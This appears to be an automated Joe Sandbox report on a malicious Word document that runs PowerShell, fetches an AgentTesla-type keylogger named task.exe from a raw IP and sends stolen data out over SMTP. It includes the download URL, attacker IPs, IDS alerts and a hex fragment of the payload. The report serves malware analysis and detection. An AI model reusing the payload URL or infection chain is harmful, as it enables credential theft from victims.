Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\task[1].exe			Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 173.232.204.89:80

Source: global traffic

DNS query: name: us2.smtp.mailhostbox.com

Source: C:\Users\user\AppData\Roaming\task.exe

Code function: 4x nop then jmp 05271471h

9_2_05271404

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 173.232.204.89:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49169 -> 208.91.198.143:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49170 -> 208.91.198.143:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49171 -> 208.91.198.143:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49172 -> 208.91.198.143:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49173 -> 208.91.199.224:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49175 -> 208.91.198.143:587

Source: global traffic

HTTP traffic detected: GET /task.exe HTTP/1.1Host: 173.232.204.89Connection: Keep-Alive

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.19.9Date: Thu, 25 Nov 2021 17:21:19 GMTContent-Type: application/octet-streamContent-Length: 504832Last-Modified: Thu, 25 Nov 2021 10:52:42 GMTConnection: keep-aliveETag: "619f6afa-7b400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 fa 6a 9f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 aa 07 00 00 08 00 00 00 00 00 00 ce c9 07 00 00 20 00 00 00 e0 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c c9 07 00 4f 00 00 00 00 e0 07 00 bc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 a9 07 00 00 20 00 00 00 aa 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 bc 05 00 00 00 e0 07 00 00 06 00 00 00 ac 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 08 00 00 02 00 00 00 b2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 07 00 00 00 00 00 48 00 00 00 02 00 05 00 a8 65 00 00 b4 74 00 00 03 00 00 00 93 00 00 06 5c da 00 00 20 ef 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 20 00 00 0a 2a 1e 02 7b 21 00 00 0a 2a 1e 02 7b 22 00 00 0a 2a 1e 02 7b 23 00 00 0a 2a 92 02 28 24 00 00 0a 02 03 7d 20 00 00 0a 02 04 7d 21 00 00 0a 02 05 7d 22 00 00 0a 02 0e 04 7d 23 00 00 0a 2a 00 00 00 13 30 03 00 73 00 00 00 01 00 00 11 03 75 01 00 00 1b 0a 02 06 2e 66 06 2c 60 28 25 00 00 0a 02 7b 20 00 00 0a 06 7b 20 00 00 0a 6f 26 00 00 0a 2c 48 28 27 00 00 0a 02 7b 21 00 00 0a 06 7b 21 00 00 0a 6f 28 00 00 0a 2c 30 28 29 00 00 0a 02 7b 22 00 00 0a 06 7b 22 00 00 0a 6f 2a 00 00 0a 2c 18 28 2b 00 00 0a 02 7b 23 00 00 0a 06 7b 23 00 00 0a 6f 2c 00 00 0a 2b 01 16 2b 01 17 2a 00 13 30 03 00 62 00 00 00 00 00 00 00 20 e4 ab 40 64 20 29 55 55 a5 5a 28 25 00 00 0a 02 7b 20 00 00 0a 6f 2d 00 00 0a 58 20 29 55 55 a5 5a 28 27 00 00 0a 02 7b 21 00 00 0a 6f 2e 00 00 0a 58 20 29 55 55 a5 5a 28 29 00 00 0a 02 7b 22 00 00 0a 6f 2f 00 00 0a 58 20 29 55 55 a5 5a 28 2b 00 00 0a 02 7b 23 00 00 0a 6f 30 00 00 0a 58 2a 00 00 13 30 07 00 b2 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.19.9Date: Thu, 25 Nov 2021 17:21:28 GMTContent-Type: application/octet-streamContent-Length: 504832Last-Modified: Thu, 25 Nov 2021 10:52:42 GMTConnection: keep-aliveETag: "619f6afa-7b400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 fa 6a 9f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 aa 07 00 00 08 00 00 00 00 00 00 ce c9 07 00 00 20 00 00 00 e0 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c c9 07 00 4f 00 00 00 00 e0 07 00 bc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 a9 07 00 00 20 00 00 00 aa 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 bc 05 00 00 00 e0 07 00 00 06 00 00 00 ac 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 08 00 00 02 00 00 00 b2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 07 00 00 00 00 00 48 00 00 00 02 00 05 00 a8 65 00 00 b4 74 00 00 03 00 00 00 93 00 00 06 5c da 00 00 20 ef 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 20 00 00 0a 2a 1e 02 7b 21 00 00 0a 2a 1e 02 7b 22 00 00 0a 2a 1e 02 7b 23 00 00 0a 2a 92 02 28 24 00 00 0a 02 03 7d 20 00 00 0a 02 04 7d 21 00 00 0a 02 05 7d 22 00 00 0a 02 0e 04 7d 23 00 00 0a 2a 00 00 00 13 30 03 00 73 00 00 00 01 00 00 11 03 75 01 00 00 1b 0a 02 06 2e 66 06 2c 60 28 25 00 00 0a 02 7b 20 00 00 0a 06 7b 20 00 00 0a 6f 26 00 00 0a 2c 48 28 27 00 00 0a 02 7b 21 00 00 0a 06 7b 21 00 00 0a 6f 28 00 00 0a 2c 30 28 29 00 00 0a 02 7b 22 00 00 0a 06 7b 22 00 00 0a 6f 2a 00 00 0a 2c 18 28 2b 00 00 0a 02 7b 23 00 00 0a 06 7b 23 00 00 0a 6f 2c 00 00 0a 2b 01 16 2b 01 17 2a 00 13 30 03 00 62 00 00 00 00 00 00 00 20 e4 ab 40 64 20 29 55 55 a5 5a 28 25 00 00 0a 02 7b 20 00 00 0a 6f 2d 00 00 0a 58 20 29 55 55 a5 5a 28 27 00 00 0a 02 7b 21 00 00 0a 6f 2e 00 00 0a 58 20 29 55 55 a5 5a 28 29 00 00 0a 02 7b 22 00 00 0a 6f 2f 00 00 0a 58 20 29 55 55 a5 5a 28 2b 00 00 0a 02 7b 23 00 00 0a 6f 30 00 00 0a 58 2a 00 00 13 30 07 00 b2 00 00 0

Source: global traffic

HTTP traffic detected: GET /task.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 173.232.204.89Connection: Keep-Alive

Source: Joe Sandbox View	ASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
Source: Joe Sandbox View	ASN Name: EONIX-COMMUNICATIONS-ASBLOCK-62904US EONIX-COMMUNICATIONS-ASBLOCK-62904US

Source: Joe Sandbox View	IP Address: 208.91.198.143 208.91.198.143
Source: Joe Sandbox View	IP Address: 208.91.199.224 208.91.199.224

Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 208.91.199.224:587
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 208.91.198.143:587

Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 208.91.199.224:587
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 208.91.198.143:587

Source: powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmp	String found in binary or memory: httP://173.232
Source: powershell.exe, 00000003.00000002.438371643.000000000373C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmp	String found in binary or memory: httP://173.232.2
Source: powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmp	String found in binary or memory: httP://173.232.204.89/t
Source: powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmp	String found in binary or memory: httP://173.232.204.89/task.ex
Source: powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.425635089.0000000002D8F000.00000004.00000001.sdmp	String found in binary or memory: httP://173.232.204.89/task.exe
Source: powershell.exe, 00000003.00000002.438371643.000000000373C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmp	String found in binary or memory: httP://173.232.204.89/task.exePE
Source: powershell.exe, 00000003.00000002.438371643.000000000373C000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.438810509.0000000003839000.00000004.00000001.sdmp	String found in binary or memory: http://173.232.204.89
Source: powershell.exe, 00000003.00000002.438371643.000000000373C000.00000004.00000001.sdmp	String found in binary or memory: http://173.232.204.89/task.exe
Source: powershell.exe, 00000003.00000002.429782897.00000000001F9000.00000004.00000020.sdmp	String found in binary or memory: http://java.lp
Source: powershell.exe, 00000003.00000002.432791776.0000000002300000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.424597897.0000000002340000.00000002.00020000.sdmp, task.exe, 00000009.00000002.449659723.0000000004E40000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: task.exe, 00000009.00000002.448392775.000000000239B000.00000004.00000001.sdmp, task.exe, 00000009.00000002.448245282.00000000022AF000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.432791776.0000000002300000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.424597897.0000000002340000.00000002.00020000.sdmp, task.exe, 00000009.00000002.449659723.0000000004E40000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000005.00000002.424310853.00000000003AF000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.424310853.00000000003AF000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: task.exe, 00000009.00000002.448684554.00000000032AD000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{527B5D4D-3E6F-42BD-8FFA-6C52D5EDBEDF}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: us2.smtp.mailhostbox.com

Source: global traffic	HTTP traffic detected: GET /task.exe HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 173.232.204.89Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /task.exe HTTP/1.1Host: 173.232.204.89Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89
Source: unknown	TCP traffic detected without corresponding DNS query: 173.232.204.89

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\Users\user\AppData\Roaming\task.exe

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\task.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\task.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary:

Document contains OLE streams with names of living off the land binaries

Show sources

Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.dr	Stream path '_1699369627/\x1Ole10Native' : L}....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT..... ...C:\CbkepaDw\abdtfhghgeghDp..ScT.l.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.dr	Stream path '_1699369659/\x1Ole10Native' : <~....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT.....6...C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp..ScT..\|..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Powershell drops PE file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\task.exe

Jump to dropped file

.NET source code contains very large array initializations

Show sources

Source: 14.0.task.exe.400000.11.unpack, u003cPrivateImplementationDetailsu003eu007b58494291u002d801Du002d4F82u002dA213u002d350FC89214C0u007d/u0034EFFEBBBu002d9C57u002d41F6u002dB4B3u002d5EB0A7648FCF.cs

Large array initialization: .cctor: array initializer size 12035

Microsoft Office creates scripting files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT

Jump to behavior

Office process drops PE file

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\task[1].exe

Jump to dropped file

Document contains a stream with embedded javascript code

Show sources

Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.dr	Stream path '_1699369627/\x1Ole10Native' : Found JS content: L}....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT..... ...C:\CbkepaDw\abdtfhghgeghDp..ScT.l............................................................................................................................................................
Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.dr	Stream path '_1699369659/\x1Ole10Native' : Found JS content: <~....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT.....6...C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp..ScT..\|.....................................................................................................................................

Found suspicious RTF objects

Show sources

Source: abdtfhgXgeghDp.ScT

Static RTF information: Object: 0 Offset: 000007DAh abdtfhgXgeghDp.ScT

Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.dr

OLE indicator application name: unknown

Source: C:\Users\user\AppData\Roaming\task.exe	Code function: 9_2_002561F8	9_2_002561F8
Source: C:\Users\user\AppData\Roaming\task.exe	Code function: 9_2_00256208	9_2_00256208
Source: C:\Users\user\AppData\Roaming\task.exe	Code function: 9_2_00256448	9_2_00256448
Source: C:\Users\user\AppData\Roaming\task.exe	Code function: 9_2_00256458	9_2_00256458
Source: C:\Users\user\AppData\Roaming\task.exe	Code function: 9_2_00251DE0	9_2_00251DE0
Source: C:\Users\user\AppData\Roaming\task.exe	Code function: 14_2_003A65D8	14_2_003A65D8
Source: C:\Users\user\AppData\Roaming\task.exe	Code function: 14_2_003AD680	14_2_003AD680
Source: C:\Users\user\AppData\Roaming\task.exe	Code function: 14_2_003A59C0	14_2_003A59C0
Source: C:\Users\user\AppData\Roaming\task.exe	Code function: 14_2_003A5D08	14_2_003A5D08
Source: C:\Users\user\AppData\Roaming\task.exe	Code function: 14_2_003A2297	14_2_003A2297
Source: C:\Users\user\AppData\Roaming\task.exe	Code function: 14_2_003A2608	14_2_003A2608
Source: C:\Users\user\AppData\Roaming\task.exe	Code function: 14_2_003ADE38	14_2_003ADE38
Source: C:\Users\user\AppData\Roaming\task.exe	Code function: 14_2_00BE1298	14_2_00BE1298
Source: C:\Users\user\AppData\Roaming\task.exe	Code function: 14_2_00BE5CE0	14_2_00BE5CE0
Source: C:\Users\user\AppData\Roaming\task.exe	Code function: 14_2_00BE0048	14_2_00BE0048
Source: C:\Users\user\AppData\Roaming\task.exe	Code function: 14_2_00BE37A0	14_2_00BE37A0
Source: C:\Users\user\AppData\Roaming\task.exe	Code function: 14_2_00BEA930	14_2_00BEA930
Source: C:\Users\user\AppData\Roaming\task.exe	Code function: 14_2_00BECB00	14_2_00BECB00
Source: C:\Users\user\AppData\Roaming\task.exe	Code function: 14_2_00BE0006	14_2_00BE0006
Source: C:\Users\user\AppData\Roaming\task.exe	Code function: 14_2_00BE8160	14_2_00BE8160
Source: C:\Users\user\AppData\Roaming\task.exe	Code function: 14_2_00BE8950	14_2_00BE8950
Source: C:\Users\user\AppData\Roaming\task.exe	Code function: 14_2_021F0048	14_2_021F0048

Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\task[1].exe A031918E001745C0F07D5D0AC118A0BFEB946236033E20FA1B16E0D54EE7BCB8
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\SzfukVRF.exe A031918E001745C0F07D5D0AC118A0BFEB946236033E20FA1B16E0D54EE7BCB8
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\task.exe A031918E001745C0F07D5D0AC118A0BFEB946236033E20FA1B16E0D54EE7BCB8

Source: C:\Users\user\AppData\Roaming\task.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: 00000005.00000002.424289946.0000000000360000.00000004.00000020.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: 00000003.00000002.429522504.0000000000170000.00000004.00000020.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28

Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.dr

OLE indicator has summary info: false

Source: task[1].exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: task.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: SzfukVRF.exe.9.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$GO DEL SALDO.doc

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winDOC@21/27@8/3

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Users\user\AppData\Roaming\task.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................p.......#.................7.....p.........7.......2.....`I4........v.....................K;.....................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#................E.k......................W.............}..v....0.......0...............x"z.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...h.......0................!z.....6.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../................E.k.... .................W.............}..v............0...............x"z.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.W.............}..v............0................!z.....".......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;................E.k....h.................W.............}..v............0...............x"z.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G...............1E.k.... %z...............W.............}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G................E.k....h.................W.............}..v............0...............x"z.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S...............1E.k.... %z...............W.............}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S................E.k....h.................W.............}..v............0...............x"z.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._.......u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.t.a.s.k...e.x.e.'. .......0................!z.....8.......................	Jump to behavior
